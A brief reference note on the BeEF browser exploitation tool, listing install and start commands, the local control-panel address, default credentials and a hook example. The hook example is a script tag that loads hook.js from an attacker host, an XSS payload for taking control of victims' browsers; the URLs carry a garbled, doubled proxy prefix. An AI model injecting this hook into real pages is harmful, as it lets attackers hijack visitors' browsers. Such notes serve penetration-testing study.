BeEF is a GUI tool that can be used for client-side attacks within a browser.
Installation
sudo apt install beef-xssStart
sudo beef-xssStop
sudo service beef-xss stopUsage
Access BeEF at http://127.0.0.1:3000/ui/panel. Demo page at http://127.0.0.1:3000/demos/basic.html
Default credentials: beef/beef
Hook example
<script src="http://<IP>:3000/hook.js"></script><script src="http://127.0.0.1:3000/hook.js"></script>